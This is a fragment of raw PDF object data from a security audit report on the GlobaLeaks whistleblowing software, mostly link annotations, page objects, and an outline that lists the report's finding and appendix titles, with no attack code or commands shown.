 /URI (http://en.wikipedia.org/wiki/Principle_of_least_privilege) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 105.6929
 633.7736
 179.0629
 645.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER196': class LinkAnnotation 
244 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 253 0 R
 /XYZ
 62.69291
 567.0236
 0 ]
 /Rect [ 194.0629
 252.7736
 282.4229
 264.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page34': class PDFPage 
245 0 obj
% Page dictionary
<< /Annots [ 242 0 R
 243 0 R
 244 0 R ]
 /Contents 376 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Page35': class PDFPage 
246 0 obj
% Page dictionary
<< /Contents 377 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER197': class LinkAnnotation 
247 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 181 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 189.6998
 696.7736
 516.4627
 708.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER198': class PDFDictionary 
248 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://en.wikipedia.org/wiki/Captcha) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 62.69291
 660.7736
 115.4729
 672.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER199': class LinkAnnotation 
249 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 216 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 188.3757
 600.7736
 530.342
 612.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER200': class LinkAnnotation 
250 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 216 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 62.69291
 588.7736
 95.48291
 600.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER201': class LinkAnnotation 
251 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 245 0 R
 /XYZ
 62.69291
 464.5236
 0 ]
 /Rect [ 135.3479
 528.7736
 218.7079
 540.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER202': class PDFDictionary 
252 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://github.com/globaleaks/GlobaLeaks/issues/672) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 96.91852
 183.7736
 196.0697
 195.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page36': class PDFPage 
253 0 obj
% Page dictionary
<< /Annots [ 247 0 R
 248 0 R
 249 0 R
 250 0 R
 251 0 R
 252 0 R ]
 /Contents 378 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Page37': class PDFPage 
254 0 obj
% Page dictionary
<< /Contents 379 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER203': class PDFDictionary 
255 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (http://check.torproject.org) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 134.0529
 738.7736
 249.6629
 750.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER204': class PDFDictionary 
256 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (http://docs.python.org/3/using/cmdline.html#cmdoption-R) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 501.4527
 720.7736
 532.472
 732.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER205': class PDFDictionary 
257 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (http://docs.python.org/3/using/cmdline.html#cmdoption-R) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 85.69291
 708.7736
 155.7229
 720.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER206': class PDFDictionary 
258 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (http://bugs.python.org/issue13703) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 175.1829
 708.7736
 263.5729
 720.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page38': class PDFPage 
259 0 obj
% Page dictionary
<< /Annots [ 255 0 R
 256 0 R
 257 0 R
 258 0 R ]
 /Contents 380 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Page39': class PDFPage 
260 0 obj
% Page dictionary
<< /Contents 381 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Page40': class PDFPage 
261 0 obj
% Page dictionary
<< /Contents 382 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER207': class PDFDictionary 
262 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (http://bugs.python.org/issue13703) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 221.7028
 684.7736
 376.2028
 696.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER208': class PDFDictionary 
263 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (http://cyclone.io/documentation/web.html#cyclone.web.RequestHandler.check_xsrf_cookie) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 186.3029
 294.7736
 235.7629
 306.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER209': class PDFDictionary 
264 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (http://abortz.net/papers/timingweb.pdf) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 190.1829
 102.7736
 228.5229
 114.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page41': class PDFPage 
265 0 obj
% Page dictionary
<< /Annots [ 262 0 R
 263 0 R
 264 0 R ]
 /Contents 383 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER210': class PDFDictionary 
266 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (http://abortz.net/papers/timingweb.pdf) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 335.8229
 714.7736
 374.1629
 726.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page42': class PDFPage 
267 0 obj
% Page dictionary
<< /Annots [ 266 0 R ]
 /Contents 384 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER211': class LinkAnnotation 
268 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 260 0 R
 /XYZ
 62.69291
 768.5236
 0 ]
 /Rect [ 320.4223
 684.7736
 422.4457
 696.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page43': class PDFPage 
269 0 obj
% Page dictionary
<< /Annots [ 268 0 R ]
 /Contents 385 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER212': class PDFDictionary 
270 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://github.com/globaleaks/GlobaLeaks/issues/604) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 97.59915
 348.7736
 130.3991
 360.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page44': class PDFPage 
271 0 obj
% Page dictionary
<< /Annots [ 270 0 R ]
 /Contents 386 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER213': class PDFDictionary 
272 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://media.blackhat.com/us-13/US-13-Smyth-Truncating-TLS-Connections-to-Violate-Beliefs-in-Web-Applications-WP.pdf) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 476.4727
 672.7736
 529.8027
 684.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page45': class PDFPage 
273 0 obj
% Page dictionary
<< /Annots [ 272 0 R ]
 /Contents 387 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER214': class LinkAnnotation 
274 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 181 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 200.5129
 714.7736
 520.0929
 726.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page46': class PDFPage 
275 0 obj
% Page dictionary
<< /Annots [ 274 0 R ]
 /Contents 388 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Page47': class PDFPage 
276 0 obj
% Page dictionary
<< /Contents 389 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Page48': class PDFPage 
277 0 obj
% Page dictionary
<< /Contents 390 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Page49': class PDFPage 
278 0 obj
% Page dictionary
<< /Contents 391 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'R279': class PDFCatalog 
279 0 obj
% Document Root
<< /Outlines 281 0 R
 /PageLabels 392 0 R
 /PageMode /UseNone
 /Pages 342 0 R
 /Type /Catalog >>
endobj
% 'R280': class PDFInfo 
280 0 obj
<< /Author ()
 /CreationDate (D:20150223152252+00'00')
 /Creator (\(unspecified\))
 /Keywords ()
 /Producer (ReportLab PDF Library - www.reportlab.com)
 /Subject (\(unspecified\))
 /Title (Report of Security Audit of GlobaLeaks) >>
endobj
% 'R281': class PDFOutlines 
281 0 obj
<< /Count 70
 /First 282 0 R
 /Last 341 0 R
 /Type /Outlines >>
endobj
% 'Outline.0': class OutlineEntryObject 
282 0 obj
<< /Count 3
 /Dest [ 137 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /First 283 0 R
 /Last 285 0 R
 /Next 286 0 R
 /Parent 281 0 R
 /Title (Overview) >>
endobj
% 'Outline.61.0': class OutlineEntryObject 
283 0 obj
<< /Dest [ 137 0 R
 /XYZ
 62.69291
 690.0236
 0 ]
 /Next 284 0 R
 /Parent 282 0 R
 /Title (Report Revision) >>
endobj
% 'Outline.61.1': class OutlineEntryObject 
284 0 obj
<< /Dest [ 137 0 R
 /XYZ
 62.69291
 630.0236
 0 ]
 /Next 285 0 R
 /Parent 282 0 R
 /Prev 283 0 R
 /Title (Audit Scope) >>
endobj
% 'Outline.61.2': class OutlineEntryObject 
285 0 obj
<< /Dest [ 137 0 R
 /XYZ
 62.69291
 570.0236
 0 ]
 /Parent 282 0 R
 /Prev 284 0 R
 /Title (Methodology and Disclosure) >>
endobj
% 'Outline.1': class OutlineEntryObject 
286 0 obj
<< /Count 1
 /Dest [ 141 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /First 287 0 R
 /Last 287 0 R
 /Next 288 0 R
 /Parent 281 0 R
 /Prev 282 0 R
 /Title (Process) >>
endobj
% 'Outline.62.0': class OutlineEntryObject 
287 0 obj
<< /Dest [ 141 0 R
 /XYZ
 62.69291
 282.0236
 0 ]
 /Parent 286 0 R
 /Title (Issue Investigation and Remediation) >>
endobj
% 'Outline.2': class OutlineEntryObject 
288 0 obj
<< /Count 4
 /Dest [ 148 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /First 289 0 R
 /Last 292 0 R
 /Next 293 0 R
 /Parent 281 0 R
 /Prev 286 0 R
 /Title (Coverage) >>
endobj
% 'Outline.63.0': class OutlineEntryObject 
289 0 obj
<< /Count 2
 /Dest [ 148 0 R
 /XYZ
 62.69291
 624.0236
 0 ]
 /First 290 0 R
 /Last 291 0 R
 /Next 292 0 R
 /Parent 288 0 R
 /Title (Target Code) >>
endobj
% 'Outline.64.0': class OutlineEntryObject 
290 0 obj
<< /Dest [ 148 0 R
 /XYZ
 62.69291
 594.0236
 0 ]
 /Next 291 0 R
 /Parent 289 0 R
 /Title (Revision) >>
endobj
% 'Outline.64.1': class OutlineEntryObject 
291 0 obj
<< /Dest [ 148 0 R
 /XYZ
 62.69291
 537.0236
 0 ]
 /Parent 289 0 R
 /Prev 290 0 R
 /Title (Dependencies) >>
endobj
% 'Outline.63.1': class OutlineEntryObject 
292 0 obj
<< /Dest [ 148 0 R
 /XYZ
 62.69291
 121.0236
 0 ]
 /Parent 288 0 R
 /Prev 289 0 R
 /Title (Target Configuration) >>
endobj
% 'Outline.3': class OutlineEntryObject 
293 0 obj
<< /Count 23
 /Dest [ 150 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /First 294 0 R
 /Last 313 0 R
 /Next 317 0 R
 /Parent 281 0 R
 /Prev 288 0 R
 /Title (Findings) >>
endobj
% 'Outline.65.0': class OutlineEntryObject 
294 0 obj
<< /Count 18
 /Dest [ 150 0 R
 /XYZ
 62.69291
 732.0236
 0 ]
 /First 295 0 R
 /Last 312 0 R
 /Next 313 0 R
 /Parent 293 0 R
 /Title (Vulnerabilities) >>
endobj
% 'Outline.66.0': class OutlineEntryObject 
295 0 obj
<< /Dest [ 150 0 R
 /XYZ
 62.69291
 642.0236
 0 ]
 /Next 296 0 R
 /Parent 294 0 R
 /Title (Issue Format) >>
endobj
% 'Outline.66.1': class OutlineEntryObject 
296 0 obj
<< /Dest [ 153 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 297 0 R
 /Parent 294 0 R
 /Prev 295 0 R
 /Title (Issue A. Plaintext is Written to Disk Before Encryption) >>
endobj
% 'Outline.66.2': class OutlineEntryObject 
297 0 obj
<< /Dest [ 158 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 298 0 R
 /Parent 294 0 R
 /Prev 296 0 R
 /Title (Issue B. SHA256 of Plaintext File is Saved when Encryption is Enabled) >>
endobj
% 'Outline.66.3': class OutlineEntryObject 
298 0 obj
<< /Dest [ 170 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 299 0 R
 /Parent 294 0 R
 /Prev 297 0 R
 /Title (Issue C. Receipts are Vulnerable to Guessing) >>
endobj
% 'Outline.66.4': class OutlineEntryObject 
299 0 obj
<< /Dest [ 176 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 300 0 R
 /Parent 294 0 R
 /Prev 298 0 R
 /Title (Issue D. A Receiver Can Suppress File Encryption With No Warning to Others) >>
endobj
% 'Outline.66.5': class OutlineEntryObject 
300 0 obj
<< /Dest [ 181 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 301 0 R
 /Parent 294 0 R
 /Prev 299 0 R
 /Title (Issue E. Parallel Requests Bypass Exponentially Increasing Login Delay) >>
endobj
% 'Outline.66.6': class OutlineEntryObject 
301 0 obj
<< /Dest [ 188 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 302 0 R
 /Parent 294 0 R
 /Prev 300 0 R
 /Title (Issue F. Tip Files Can Be Downloaded Without Authenticating) >>
endobj
% 'Outline.66.7': class OutlineEntryObject 
302 0 obj
<< /Dest [ 195 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 303 0 R
 /Parent 294 0 R
 /Prev 301 0 R
 /Title (Issue G. Unescaped Characters Put Into Content-Disposition Header) >>
endobj
% 'Outline.66.8': class OutlineEntryObject 
303 0 obj
<< /Dest [ 200 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 304 0 R
 /Parent 294 0 R
 /Prev 302 0 R
 /Title (Issue H. Plaintext File Kept on Server when Whistleblower Does Not Finish Submitting Tip) >>
endobj
% 'Outline.66.9': class OutlineEntryObject 
304 0 obj
<< /Dest [ 209 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 305 0 R
 /Parent 294 0 R
 /Prev 303 0 R
 /Title (Issue I. User Input Written to Logs) >>
endobj
% 'Outline.66.10': class OutlineEntryObject 
305 0 obj
<< /Dest [ 216 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 306 0 R
 /Parent 294 0 R
 /Prev 304 0 R
 /Title (Issue J: Attacker May Be Able To Extract Secrets Through Side-Channel Attacks) >>
endobj
% 'Outline.66.11': class OutlineEntryObject 
306 0 obj
<< /Dest [ 220 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 307 0 R
 /Parent 294 0 R
 /Prev 305 0 R
 /Title (Issue J.1: Timing Leak of File Download Token) >>
endobj
% 'Outline.66.12': class OutlineEntryObject 
307 0 obj
<< /Dest [ 224 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 308 0 R
 /Parent 294 0 R
 /Prev 306 0 R
 /Title (Issue J.2: Timing Leak of Collection Download Token) >>
endobj
% 'Outline.66.13': class OutlineEntryObject 
308 0 obj
<< /Dest [ 227 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 309 0 R
 /Parent 294 0 R
 /Prev 307 0 R
 /Title (Issue J.3: Timing Leak of XSRF Token) >>
endobj
% 'Outline.66.14': class OutlineEntryObject 
309 0 obj
<< /Dest [ 229 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 310 0 R
 /Parent 294 0 R
 /Prev 308 0 R
 /Title (Issue J.4: Timing Leak of Session ID) >>
endobj
% 'Outline.66.15': class OutlineEntryObject 
310 0 obj
<< /Dest [ 234 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 311 0 R
 /Parent 294 0 R
 /Prev 309 0 R
 /Title (Issue J.5: Timing Leak of Usernames) >>
endobj
% 'Outline.66.16': class OutlineEntryObject 
311 0 obj
<< /Dest [ 238 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 312 0 R
 /Parent 294 0 R
 /Prev 310 0 R
 /Title (Issue J.6: Timing Leak of Receipt Hashes) >>
endobj
% 'Outline.66.17': class OutlineEntryObject 
312 0 obj
<< /Dest [ 239 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Parent 294 0 R
 /Prev 311 0 R
 /Title (Issue K: Secrets Generated with Non-CSPRNG) >>
endobj
% 'Outline.65.1': class OutlineEntryObject 
313 0 obj
<< /Count 3
 /Dest [ 245 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /First 314 0 R
 /Last 315 0 R
 /Parent 293 0 R
 /Prev 294 0 R
 /Title (Design and Implementation Analysis) >>
endobj
% 'Outline.67.0': class OutlineEntryObject 
314 0 obj
<< /Dest [ 245 0 R
 /XYZ
 62.69291
 693.0236
 0 ]
 /Next 315 0 R
 /Parent 313 0 R
 /Title (Commendations) >>
endobj
% 'Outline.67.1': class OutlineEntryObject 
315 0 obj
<< /Count 1
 /Dest [ 245 0 R
 /XYZ
 62.69291
 462.0236
 0 ]
 /First 316 0 R
 /Last 316 0 R
 /Parent 313 0 R
 /Prev 314 0 R
 /Title (Recommendations) >>
endobj
% 'Outline.68.0': class OutlineEntryObject 
316 0 obj
<< /Dest [ 245 0 R
 /XYZ
 62.69291
 363.0236
 0 ]
 /Parent 315 0 R
 /Title (Coding Practices) >>
endobj
% 'Outline.4': class OutlineEntryObject 
317 0 obj
<< /Count 4
 /Dest [ 253 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /First 318 0 R
 /Last 321 0 R
 /Next 322 0 R
 /Parent 281 0 R
 /Prev 293 0 R
 /Title (Future Work) >>
endobj
% 'Outline.69.0': class OutlineEntryObject 
318 0 obj
<< /Dest [ 253 0 R
 /XYZ
 62.69291
 732.0236
 0 ]
 /Next 319 0 R
 /Parent 317 0 R
 /Title (Online Guessing Attacks) >>
endobj
% 'Outline.69.1': class OutlineEntryObject 
319 0 obj
<< /Dest [ 253 0 R
 /XYZ
 62.69291
 648.0236
 0 ]
 /Next 320 0 R
 /Parent 317 0 R
 /Prev 318 0 R
 /Title (Side-Channel Attacks) >>
endobj
% 'Outline.69.2': class OutlineEntryObject 
320 0 obj
<< /Dest [ 253 0 R
 /XYZ
 62.69291
 564.0236
 0 ]
 /Next 321 0 R
 /Parent 317 0 R
 /Prev 319 0 R
 /Title (Eliminating Threads) >>
endobj
% 'Outline.69.3': class OutlineEntryObject 
321 0 obj
<< /Dest [ 253 0 R
 /XYZ
 62.69291
 492.0236
 0 ]
 /Parent 317 0 R
 /Prev 320 0 R
 /Title (Open Questions & Concerns) >>
endobj
% 'Outline.5': class OutlineEntryObject 
322 0 obj
<< /Count 15
 /Dest [ 260 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /First 323 0 R
 /Last 337 0 R
 /Next 338 0 R
 /Parent 281 0 R
 /Prev 317 0 R
 /Title (Appendix A. Work Log) >>
endobj
% 'Outline.70.0': class OutlineEntryObject 
323 0 obj
<< /Dest [ 260 0 R
 /XYZ
 62.69291
 732.0236
 0 ]
 /Next 324 0 R
 /Parent 322 0 R
 /Title (Prior to This Audit) >>
endobj
% 'Outline.70.1': class OutlineEntryObject 
324 0 obj
<< /Dest [ 260 0 R
 /XYZ
 62.69291
 660.0236
 0 ]
 /Next 325 0 R
 /Parent 322 0 R
 /Prev 323 0 R
 /Title (2014-01-28 to 2014-02-03) >>
endobj
% 'Outline.70.2': class OutlineEntryObject 
325 0 obj
<< /Dest [ 260 0 R
 /XYZ
 62.69291
 522.0236
 0 ]
 /Next 326 0 R
 /Parent 322 0 R
 /Prev 324 0 R
 /Title (2014-02-04) >>
endobj
% 'Outline.70.3': class OutlineEntryObject 
326 0 obj
<< /Dest [ 260 0 R
 /XYZ
 62.69291
 360.0236
 0 ]
 /Next 327 0 R
 /Parent 322 0 R
 /Prev 325 0 R
 /Title (2014-02-05) >>
endobj
% 'Outline.70.4': class OutlineEntryObject 
327 0 obj
<< /Dest [ 261 0 R
 /XYZ
 62.69291
 299.5441
 0 ]
 /Next 328 0 R
 /Parent 322 0 R
 /Prev 326 0 R
 /Title (2014-02-06) >>
endobj
% 'Outline.70.5': class OutlineEntryObject 
328 0 obj
<< /Dest [ 265 0 R
 /XYZ
 62.69291
 453.0236
 0 ]
 /Next 329 0 R
 /Parent 322 0 R
 /Prev 327 0 R
 /Title (2014-02-07) >>
endobj
% 'Outline.70.6': class OutlineEntryObject 
329 0 obj
<< /Dest [ 265 0 R
 /XYZ
 62.69291
 399.0236
 0 ]
 /Next 330 0 R
 /Parent 322 0 R
 /Prev 328 0 R
 /Title (2014-02-10) >>
endobj
% 'Outline.70.7': class OutlineEntryObject 
330 0 obj
<< /Dest [ 265 0 R
 /XYZ
 62.69291
 243.0236
 0 ]
 /Next 331 0 R
 /Parent 322 0 R
 /Prev 329 0 R
 /Title (2014-02-11) >>
endobj
% 'Outline.70.8': class OutlineEntryObject 
331 0 obj
<< /Dest [ 265 0 R
 /XYZ
 62.69291
 189.0236
 0 ]
 /Next 332 0 R
 /Parent 322 0 R
 /Prev 330 0 R
 /Title (2014-02-12) >>
endobj
% 'Outline.70.9': class OutlineEntryObject 
332 0 obj
<< /Dest [ 265 0 R
 /XYZ
 62.69291
 159.0236
 0 ]
 /Next 333 0 R
 /Parent 322 0 R
 /Prev 331 0 R
 /Title (2014-02-13) >>
endobj
% 'Outline.70.10': class OutlineEntryObject 
333 0 obj
<< /Dest [ 267 0 R
 /XYZ
 62.69291
 591.8236
 0 ]
 /Next 334 0 R
 /Parent 322 0 R
 /Prev 332 0 R
 /Title (2014-02-14) >>
endobj
% 'Outline.70.11': class OutlineEntryObject 
334 0 obj
<< /Dest [ 267 0 R
 /XYZ
 62.69291
 537.8236
 0 ]
 /Next 335 0 R
 /Parent 322 0 R
 /Prev 333 0 R
 /Title (2014-02-17) >>
endobj
% 'Outline.70.12': class OutlineEntryObject 
335 0 obj
<< /Dest [ 267 0 R
 /XYZ
 62.69291
 507.8236
 0 ]
 /Next 336 0 R
 /Parent 322 0 R
 /Prev 334 0 R
 /Title (2014-02-18) >>
endobj
% 'Outline.70.13': class OutlineEntryObject 
336 0 obj
<< /Dest [ 267 0 R
 /XYZ
 62.69291
 453.8236
 0 ]
 /Next 337 0 R
 /Parent 322 0 R
 /Prev 335 0 R
 /Title (2014-02-19) >>
endobj
% 'Outline.70.14': class OutlineEntryObject 
337 0 obj
<< /Dest [ 267 0 R
 /XYZ
 62.69291
 399.8236
 0 ]
 /Parent 322 0 R
 /Prev 336 0 R
 /Title (2014-02-20) >>
endobj
% 'Outline.6': class OutlineEntryObject 
338 0 obj
<< /Dest [ 269 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 339 0 R
 /Parent 281 0 R
 /Prev 322 0 R
 /Title (Appendix B. Brainstorming Notes) >>
endobj
% 'Outline.7': class OutlineEntryObject 
339 0 obj
<< /Dest [ 275 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 340 0 R
 /Parent 281 0 R
 /Prev 338 0 R
 /Title (Appendix C. Script for Issue E) >>
endobj
% 'Outline.8': class OutlineEntryObject 
340 0 obj
<< /Dest [ 276 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Next 341 0 R
 /Parent 281 0 R
 /Prev 339 0 R
 /Title (Appendix D. Side-Channel Attack Proof of Concept) >>
endobj
% 'Outline.9': class OutlineEntryObject 
341 0 obj
<< /Dest [ 278 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Parent 281 0 R
 /Prev 340 0 R
 /Title (Appendix E. Computing Multiple Target Guessing Success Probabilities) >>
endobj
% 'R342': class PDFPages 
342 0 obj
% page tree
<< /Count 49
 /Kids [ 68 0 R
 133 0 R
 137 0 R
 141 0 R
 142 0 R
 148 0 R
 149 0 R
 150 0 R
 153 0 R
 155 0 R
 158 0 R
 168 0 R
 170 0 R
 173 0 R
 176 0 R
 181 0 R
 188 0 R
 193 0 R
 195 0 R
 199 0 R
 200 0 R
 206 0 R
 209 0 R
 211 0 R
 216 0 R
 220 0 R
 224 0 R
 227 0 R
 229 0 R
 234 0 R
 238 0 R
 239 0 R
 241 0 R
 245 0 R
 246 0 R
 253 0 R
 254 0 R
 259 0 R
 260 0 R
 261 0 R
 265 0 R
 267 0 R
 269 0 R
 271 0 R
 273 0 R
 275 0 R
 276 0 R
 277 0 R
 278 0 R ]
 /Type /Pages >>
endobj
% 'R343': class PDFStream 
343 0 obj
% page stream
<< /Length 9879 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 741.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 4 Tm /F2 20 Tf 24 TL 48.24488 0 Td (Report of Security Audit of GlobaLeaks) Tj T* -48.24488 0 Td ET
Q
Q
q
1 0 0 1 62.69291 725.0236 cm
